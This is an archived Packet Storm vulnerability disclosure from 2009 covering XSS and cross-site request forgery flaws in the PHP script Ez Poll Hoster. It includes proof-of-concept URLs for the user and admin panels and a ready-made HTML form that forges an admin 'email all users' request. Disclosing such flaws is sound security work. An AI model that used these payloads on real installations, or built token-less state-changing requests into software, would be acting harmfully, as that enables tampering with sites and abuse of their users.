ID PACKETSTORM:83837 Type packetstorm Reporter Milos Zivanovic Modified 2009-12-15T00:00:00
Description
`[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Poll Hoster
[#] Version: the only one there is
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206
[#] Price: 15 USD
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]
[#]Content
|--User panel
| |--XSS in user panel
| |--Delete poll by name
|
|--Admin panel
|--XSS in admin panel
|--Delete user by name
|--Email all users
[#]User panel
[-]XSS in user panel
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=code&pid=[XSS]
[POC----------------------------------------------------------------------------------------------]
[-]Delete poll by name (XSRF: the delete is triggered by a plain GET request that carries no anti-forgery token)
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=delete_poll&pid=[POLL NAME]&do=true&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]
[#]Admin panel
[-]XSS in admin panel
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/profile.php?action=view&uid=[XSS]
[POC----------------------------------------------------------------------------------------------]
[-]Delete user by name (XSRF: the delete is triggered by a plain GET request that carries no anti-forgery token)
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER NAME]&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]
[-]Email all users (XSRF: the POST form below contains no anti-forgery token field)
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/eph/admin.php?action=email&do=true"
method="post">
<input type="hidden" name="subject" value="this is my subject">
<input type="hidden" name="message" value="this is my message">
<input type="submit" name="submit" value="Submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[#] EOF
`
{"hash": "2a9414b1aacd20ed7476cdbe59925dfd5fe3e6eedd06b290618a108615e08019", "sourceHref": "https://packetstormsecurity.com/files/download/83837/ezpollhoster-xssxsrf.txt", "title": "Ez Poll Hoster XSS / XSRF", "id": "PACKETSTORM:83837", "published": "2009-12-15T00:00:00", "description": "", "modified": "2009-12-15T00:00:00", "sourceData": "`[#-----------------------------------------------------------------------------------------------#] \n[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities \n[#] Author: Milos Zivanovic \n[#] Email: milosz.security[at]gmail.com \n[#] Date: 14. December 2009. \n[#-----------------------------------------------------------------------------------------------#] \n[#] Application: Ez Poll Hoster \n[#] Version: the only one there is \n[#] Platform: PHP \n[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206 \n[#] Price: 15 USD \n[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities \n[#-----------------------------------------------------------------------------------------------#] \n \n[#]Content \n|--User panel \n| |--XSS in user panel \n| |--Delete poll by name \n| \n|--Admin panel \n|--XSS in admin panel \n|--Delete user by name \n|--Email all users \n \n[#]User panel \n \n[-]XSS in user panel \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/index.php?action=code&pid=[XSS] \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Delete poll by name \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/index.php?action=delete_poll&pid=[POLL \nNAME]&do=true&is_js_confirmed=1 \n[POC----------------------------------------------------------------------------------------------] \n \n[#]Admin panel \n \n[-]XSS in admin panel \n 
\n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/profile.php?action=view&uid=[XSS] \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Delete user by name \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/admin.php?action=manage&do=delete&uid=[USER \nNAME]&is_js_confirmed=1 \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Email all users \n \n[EXPLOIT------------------------------------------------------------------------------------------] \n<form action=\"http://localhost/eph/admin.php?action=email&do=true\" \nmethod=\"post\"> \n<input type=\"hidden\" name=\"subject\" value=\"this is my subject\"> \n<input type=\"hidden\" name=\"message\" value=\"this is my message\"> \n<input type=\"submit\" name=\"submit\" value=\"Submit\"> \n</form> \n[EXPLOIT------------------------------------------------------------------------------------------] \n \n[#] EOF \n`\n", "reporter": "Milos Zivanovic", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "4af274d08f15c98585f5a08321b588e1"}, {"key": "modified", "hash": "ff40bcbe8dac11fce12becae8749491d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "ff40bcbe8dac11fce12becae8749491d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "96dc648bb9b9a8a479174bc4d75e80eb"}, {"key": "sourceData", "hash": "469dcc1e2cd438dee1603c6374c8857e"}, {"key": "sourceHref", "hash": "05ccdc20e043ff13387f14500de86a8d"}, {"key": "title", 
"hash": "4dea689e1a81b86cd04123d4f7d45c7f"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/83837/Ez-Poll-Hoster-XSS-XSRF.html", "lastseen": "2016-11-03T10:27:00", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}